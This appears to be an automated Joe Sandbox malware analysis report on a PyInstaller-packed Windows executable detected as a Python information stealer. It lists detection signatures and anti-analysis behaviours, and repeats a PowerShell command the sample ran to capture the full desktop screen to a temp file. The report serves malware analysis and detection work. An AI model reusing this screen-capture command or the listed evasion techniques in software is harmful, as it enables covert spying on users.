Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MkWMm5piE5.exe

Overview

General Information

Sample name:MkWMm5piE5.exe
renamed because original name is a hash value
Original sample name:2daa3a1b14af19d4daf3a60a493d2613b87eba00e13b21e1b12dcea681b3dc80.exe
Analysis ID:1571338
MD5:05d551d9e91e59cfa28c7d7b2a5e2374
SHA1:b9d58e533693c1936dc515d9c0400ca36dc0c049
SHA256:2daa3a1b14af19d4daf3a60a493d2613b87eba00e13b21e1b12dcea681b3dc80
Tags:busquedasxurl-comexeuser-JAMESWT_MHT
Infos:

Detection

Python Stealer
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Found pyInstaller with non standard icon
Sigma detected: Suspicious Script Execution From Temp Folder
Yara detected Generic Python Stealer
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • MkWMm5piE5.exe (PID: 7568 cmdline: "C:\Users\user\Desktop\MkWMm5piE5.exe" MD5: 05D551D9E91E59CFA28C7D7B2A5E2374)
    • MkWMm5piE5.exe (PID: 7680 cmdline: "C:\Users\user\Desktop\MkWMm5piE5.exe" MD5: 05D551D9E91E59CFA28C7D7B2A5E2374)
      • powershell.exe (PID: 7716 cmdline: powershell -Command " Add-Type -AssemblyName System.Windows.Forms Add-Type -AssemblyName System.Drawing $screen = [System.Windows.Forms.SystemInformation]::VirtualScreen $bitmap = New-Object System.Drawing.Bitmap $screen.Width, $screen.Height $graphics = [System.Drawing.Graphics]::FromImage($bitmap) $graphics.CopyFromScreen($screen.Location, [System.Drawing.Point]::Empty, $screen.Size) $bitmap.Save(\"C:\Users\user\AppData\Local\Temp\desktop_screenshot.png\") " MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000002.00000002.2592909254.000001E4C9C7E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GenericPythonStealerYara detected Generic Python StealerJoe Security
    Process Memory Space: MkWMm5piE5.exe PID: 7680JoeSecurity_GenericPythonStealerYara detected Generic Python StealerJoe Security

      System Summary

      barindex
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command " Add-Type -AssemblyName System.Windows.Forms Add-Type -AssemblyName System.Drawing $screen = [System.Windows.Forms.SystemInformation]::VirtualScreen $bitmap = New-Object System.Drawing.Bitmap $screen.Width, $screen.Height $graphics = [System.Drawing.Graphics]::FromImage($bitmap) $graphics.CopyFromScreen($screen.Location, [System.Drawing.Point]::Empty, $screen.Size) $bitmap.Save(\"C:\Users\user\AppData\Local\Temp\desktop_screenshot.png\") ", CommandLine: powershell -Command " Add-Type -AssemblyName System.Windows.Forms Add-Type -AssemblyName System.Drawing $screen = [System.Windows.Forms.SystemInformation]::VirtualScreen $bitmap = New-Object System.Drawing.Bitmap $screen.Width, $screen.Height $graphics = [System.Drawing.Graphics]::FromImage($bitmap) $graphics.CopyFromScreen($screen.Location, [System.Drawing.Point]::Empty, $screen.Size) $bitmap.Save(\"C:\Users\user\AppData\Local\Temp\desktop_screenshot.png\") ", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MkWMm5piE5.exe", ParentImage: C:\Users\user\Desktop\MkWMm5piE5.exe, ParentProcessId: 7680, ParentProcessName: MkWMm5piE5.exe, ProcessCommandLine: powershell -Command " Add-Type -AssemblyName System.Windows.Forms Add-Type -AssemblyName System.Drawing $screen = [System.Windows.Forms.SystemInformation]::VirtualScreen $bitmap = New-Object System.Drawing.Bitmap $screen.Width, $screen.Height $graphics = [System.Drawing.Graphics]::FromImage($bitmap) $graphics.CopyFromScreen($screen.Location, [System.Drawing.Point]::Empty, $screen.Size) $bitmap.Save(\"C:\Users\user\AppData\Local\Temp\desktop_screenshot.png\") ", ProcessId: 7716, ProcessName: powershell.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command " Add-Type -AssemblyName System.Windows.Forms Add-Type -AssemblyName System.Drawing $screen = [System.Windows.Forms.SystemInformation]::VirtualScreen $bitmap = New-Object System.Drawing.Bitmap $screen.Width, $screen.Height $graphics = [System.Drawing.Graphics]::FromImage($bitmap) $graphics.CopyFromScreen($screen.Location, [System.Drawing.Point]::Empty, $screen.Size) $bitmap.Save(\"C:\Users\user\AppData\Local\Temp\desktop_screenshot.png\") ", CommandLine: powershell -Command " Add-Type -AssemblyName System.Windows.Forms Add-Type -AssemblyName System.Drawing $screen = [System.Windows.Forms.SystemInformation]::VirtualScreen $bitmap = New-Object System.Drawing.Bitmap $screen.Width, $screen.Height $graphics = [System.Drawing.Graphics]::FromImage($bitmap) $graphics.CopyFromScreen($screen.Location, [System.Drawing.Point]::Empty, $screen.Size) $bitmap.Save(\"C:\Users\user\AppData\Local\Temp\desktop_screenshot.png\") ", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MkWMm5piE5.exe", ParentImage: C:\Users\user\Desktop\MkWMm5piE5.exe, ParentProcessId: 7680, ParentProcessName: MkWMm5piE5.exe, ProcessCommandLine: powershell -Command " Add-Type -AssemblyName System.Windows.Forms Add-Type -AssemblyName System.Drawing $screen = [System.Windows.Forms.SystemInformation]::VirtualScreen $bitmap = New-Object System.Drawing.Bitmap $screen.Width, $screen.Height $graphics = [System.Drawing.Graphics]::FromImage($bitmap) $graphics.CopyFromScreen($screen.Location, [System.Drawing.Point]::Empty, $screen.Size) $bitmap.Save(\"C:\Users\user\AppData\Local\Temp\desktop_screenshot.png\") ", ProcessId: 7716, ProcessName: powershell.exe
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: MkWMm5piE5.exeAvira: detected
      Source: MkWMm5piE5.exeReversingLabs: Detection: 42%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE47F00 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_malloc,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,strncmp,CRYPTO_free,CRYPTO_free,OPENSSL_sk_new_null,CRYPTO_free,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_push,OPENSSL_sk_delete,OPENSSL_sk_num,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_free,CRYPTO_free,OPENSSL_sk_free,2_2_00007FFEDCE47F00
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE4D040 CRYPTO_free,CRYPTO_free,CRYPTO_free_ex_data,OPENSSL_LH_free,X509_STORE_free,CTLOG_STORE_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_secure_free,EVP_MD_get0_provider,EVP_MD_free,EVP_MD_get0_provider,EVP_MD_free,EVP_CIPHER_get0_provider,EVP_CIPHER_free,EVP_MD_get0_provider,EVP_MD_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,CRYPTO_free,2_2_00007FFEDCE4D040
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE32536 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,2_2_00007FFEDCE32536
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE8FCC0 CRYPTO_free,CRYPTO_memdup,2_2_00007FFEDCE8FCC0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE47CB0 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,2_2_00007FFEDCE47CB0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE3157D CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,2_2_00007FFEDCE3157D
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE311E0 EVP_PKEY_free,X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,2_2_00007FFEDCE311E0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE3108C ERR_new,ERR_set_debug,CRYPTO_free,2_2_00007FFEDCE3108C
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE87DE0 CRYPTO_memdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,2_2_00007FFEDCE87DE0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE325EF CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,2_2_00007FFEDCE325EF
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE55DE0 CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,2_2_00007FFEDCE55DE0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE5DDC0 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,_time64,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_new_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,2_2_00007FFEDCE5DDC0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE3FDB0 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,CRYPTO_malloc,CRYPTO_malloc,EVP_PKEY_encapsulate,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_free,EVP_PKEY_CTX_free,2_2_00007FFEDCE3FDB0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE3176C CRYPTO_malloc,CRYPTO_THREAD_lock_new,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_up_ref,X509_chain_up_ref,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_dup_ex_data,CRYPTO_strdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_memdup,2_2_00007FFEDCE3176C
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE49D50 CRYPTO_free,CRYPTO_strdup,2_2_00007FFEDCE49D50
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE31B18 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,OPENSSL_cleanse,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_new,2_2_00007FFEDCE31B18
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE325A4 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,2_2_00007FFEDCE325A4
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE93F10 EVP_MD_CTX_new,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,CRYPTO_malloc,EVP_PKEY_CTX_ctrl,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,ERR_new,ERR_set_debug,2_2_00007FFEDCE93F10
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE33EE0 CRYPTO_free,2_2_00007FFEDCE33EE0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE99E90 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,2_2_00007FFEDCE99E90
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE319E7 CRYPTO_free,2_2_00007FFEDCE319E7
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE35E4A BIO_get_data,BIO_get_init,BIO_clear_flags,BIO_set_init,CRYPTO_free,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_set_init,BIO_clear_flags,BIO_get_data,BIO_set_shutdown,BIO_push,BIO_set_next,BIO_up_ref,BIO_set_init,2_2_00007FFEDCE35E4A
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE3107D CRYPTO_free,2_2_00007FFEDCE3107D
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE45FD0 OPENSSL_sk_new,COMP_get_type,CRYPTO_malloc,OPENSSL_sk_push,OPENSSL_sk_sort,2_2_00007FFEDCE45FD0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE32400 CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,2_2_00007FFEDCE32400
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE31D8E CRYPTO_free,CRYPTO_memdup,2_2_00007FFEDCE31D8E
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE55F90 CRYPTO_free,CRYPTO_free,2_2_00007FFEDCE55F90
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE3144C EVP_MD_CTX_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,2_2_00007FFEDCE3144C
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE31ACD ERR_new,ERR_set_debug,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,memcpy,ERR_new,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,2_2_00007FFEDCE31ACD
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE31B31 CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,2_2_00007FFEDCE31B31
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE8FF50 CRYPTO_free,CRYPTO_strndup,2_2_00007FFEDCE8FF50
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE758F0 CRYPTO_free,2_2_00007FFEDCE758F0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE3231F ERR_new,ERR_set_debug,_time64,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_new,EVP_MD_fetch,ERR_new,ERR_new,ERR_set_debug,EVP_MD_free,EVP_MD_get_size,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_free,CRYPTO_free,2_2_00007FFEDCE3231F
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE31555 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,2_2_00007FFEDCE31555
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE31EE2 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_find,CRYPTO_free,ERR_new,ERR_set_debug,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,2_2_00007FFEDCE31EE2
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE31997 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_decapsulate,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,2_2_00007FFEDCE31997
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE3D8AF CRYPTO_free,2_2_00007FFEDCE3D8AF
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE9B8B0 EVP_CIPHER_CTX_free,EVP_MD_CTX_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,2_2_00007FFEDCE9B8B0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE93880 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,2_2_00007FFEDCE93880
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE31483 CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,2_2_00007FFEDCE31483
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE31846 OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,OPENSSL_sk_push,OPENSSL_sk_num,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,X509_free,OPENSSL_sk_pop_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_value,X509_get0_pubkey,ERR_new,ERR_set_debug,X509_free,OPENSSL_sk_shift,OPENSSL_sk_pop_free,ERR_new,ERR_set_debug,2_2_00007FFEDCE31846
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE3193D CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,2_2_00007FFEDCE3193D
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE9D9E0 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,2_2_00007FFEDCE9D9E0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE311C2 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,memcpy,CRYPTO_free,CRYPTO_free,2_2_00007FFEDCE311C2
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE799A0 ERR_new,ERR_set_debug,EVP_MD_CTX_get0_md,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_set_mark,ERR_pop_to_mark,ERR_new,ERR_set_debug,ERR_clear_last_mark,EVP_MD_CTX_get0_md,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,2_2_00007FFEDCE799A0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE31023 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,2_2_00007FFEDCE31023
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE7D960 RAND_bytes_ex,CRYPTO_malloc,memset,2_2_00007FFEDCE7D960
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE81950 ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,CRYPTO_free,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,2_2_00007FFEDCE81950
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE63B10 CRYPTO_malloc,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,memset,OSSL_PARAM_locate_const,CRYPTO_strdup,ERR_new,ERR_set_debug,OSSL_PARAM_locate_const,CRYPTO_strdup,ERR_new,OSSL_PARAM_locate_const,OSSL_PARAM_locate_const,CRYPTO_strdup,ERR_new,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,ERR_new,OSSL_PARAM_locate_const,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,ERR_set_mark,EVP_KEYMGMT_free,ERR_pop_to_mark,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,2_2_00007FFEDCE63B10
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE3FB00 EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_derive_set_peer,EVP_PKEY_is_a,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_derive,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,2_2_00007FFEDCE3FB00
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE7FB00 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,2_2_00007FFEDCE7FB00
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 2_2_00007FFEDCE312D0 CRYPTO_THREAD_run_once,2_2_00007FFEDCE312D0
      Source: MkWMm5piE5.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
      Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: MkWMm5piE5.exe, 00000002.00000002.2597267062.00007FFEDD613000.00000002.00000001.01000000.00000004.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: MkWMm5piE5.exe, 00000002.00000002.2596478009.00007FFEDCE1F000.00000002.00000001.01000000.00000019.sdmp
      Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.11 19 Sep 20233.0.11built on: Wed Sep 27 22:33:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: MkWMm5piE5.exe, 00000002.00000002.2598515709.00007FFEDDD22000.00000002.00000001.01000000.00000012.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb source: _decimal.pyd.0.dr
      Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: MkWMm5piE5.exe, 00000002.00000002.2598515709.00007FFEDDD22000.00000002.00000001.01000000.00000012.sdmp
      Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: MkWMm5piE5.exe, 00000002.00000002.2595739361.00007FFEDCA03000.00000002.00000001.01000000.0000001F.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: MkWMm5piE5.exe, 00000002.00000002.2603818292.00007FFEF5CE6000.00000002.00000001.01000000.00000014.sdmp
